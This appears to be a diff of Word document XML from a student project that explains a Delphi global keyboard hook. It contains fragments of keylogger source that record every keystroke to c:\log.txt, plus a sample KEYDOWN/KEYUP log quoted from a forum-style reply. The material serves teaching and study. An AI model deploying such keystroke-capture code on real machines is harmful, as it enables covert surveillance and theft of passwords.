+        <w:t>    end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>exports</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>StartTheHook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>StopTheHook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>end.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>--------</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>The sample text was</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>abcdABCD</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      1234</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>!@#$</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>And the log file was:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN Space</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   Space</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN Backspace</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   Backspace</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">KEYDOWN </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>CapsLock</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">KEYUP   </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>CapsLock</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN B</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   B</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN Tab</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   Tab</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN 1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN 2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN 3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN 4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN Enter</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   Enter</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN Shift</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN !</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   !</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN @</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   @</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN #</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   #</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYDOWN $</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   $</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>KEYUP   Shift</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>You</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> may record KEYDOWN (or UP) messages only and ignore special keys like Shift and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>CapsLock</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>Regards</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>Geo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1134" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
@@ -419,6 +2985,27 @@
     <w:name w:val="Normal"/>
     <w:qFormat/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="berschrift1">
+    <w:name w:val="heading 1"/>
+    <w:basedOn w:val="Standard"/>
+    <w:next w:val="Standard"/>
+    <w:link w:val="berschrift1Zchn"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="00A46E6E"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="240" w:after="0"/>
+      <w:outlineLvl w:val="0"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="Absatz-Standardschriftart">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -479,6 +3066,103 @@
       <w:sz w:val="56"/>
       <w:szCs w:val="56"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="berschrift1Zchn">
+    <w:name w:val="Überschrift 1 Zchn"/>
+    <w:basedOn w:val="Absatz-Standardschriftart"/>
+    <w:link w:val="berschrift1"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00A46E6E"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Absatz-Standardschriftart"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A46E6E"/>
+    <w:rPr>
+      <w:strike w:val="0"/>
+      <w:dstrike w:val="0"/>
+      <w:color w:val="2781B7"/>
+      <w:u w:val="none"/>
+      <w:effect w:val="none"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="StandardWeb">
+    <w:name w:val="Normal (Web)"/>
+    <w:basedOn w:val="Standard"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A46E6E"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="180" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:eastAsia="de-CH"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="meta">
+    <w:name w:val="meta"/>
+    <w:basedOn w:val="Standard"/>
+    <w:rsid w:val="00A46E6E"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="180" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:eastAsia="de-CH"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="date1">
+    <w:name w:val="date1"/>
+    <w:basedOn w:val="Absatz-Standardschriftart"/>
+    <w:rsid w:val="00A46E6E"/>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="comment-type">
+    <w:name w:val="comment-type"/>
+    <w:basedOn w:val="Standard"/>
+    <w:rsid w:val="00A46E6E"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="180" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:eastAsia="de-CH"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="type2">
+    <w:name w:val="type2"/>
+    <w:basedOn w:val="Absatz-Standardschriftart"/>
+    <w:rsid w:val="00A46E6E"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="author6">
+    <w:name w:val="author6"/>
+    <w:basedOn w:val="Absatz-Standardschriftart"/>
+    <w:rsid w:val="00A46E6E"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="KeinLeerraum">
+    <w:name w:val="No Spacing"/>
+    <w:uiPriority w:val="1"/>
+    <w:qFormat/>
+    <w:rsid w:val="00A46E6E"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
   </w:style>
 </w:styles>
 </file>

--- a/Konzept.docx
+++ b/Konzept.docx
@@ -215,6 +215,24 @@
           <w:lang w:val="sq-AL"/>
         </w:rPr>
         <w:t>Erklärung anhand Code</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="sq-AL"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL"/>
+        </w:rPr>
+        <w:t>Reflexion</w:t>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
@@ -545,6 +563,12 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>begin</w:t>
       </w:r>
       <w:r>
@@ -703,177 +727,323 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
+        <w:t>        VK_DELETE: buf := 'Delete';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_TAB: buf := 'Tab';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_RETURN: buf := 'Enter';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_SHIFT: buf := 'Shift';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_CAPITAL: buf := 'CapsLock';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_ESCAPE: buf := 'Esc';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_SPACE: buf := 'Space';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        // etc. keys you're interested in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      else</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        buf := AChar[0];</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      LogText := LogText + buf;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // open the log file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      FileName := 'c:\log.txt'; // your log filename here</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      AssignFile(FF, FileName);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      if FileExists(FileName) then Append(FF)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      else Rewrite(FF);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // write to the log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      WriteLn(FF, LogText);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // close the log file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      CloseFile(FF);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  {Call the next hook in the hook chain}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  if (Code &lt; 0) then</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    result := CallNextHookEx(TheHookHandle, Code, wParam, lParam);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>procedure StartTheHook; stdcall;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  if (TheHookHandle = 0) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
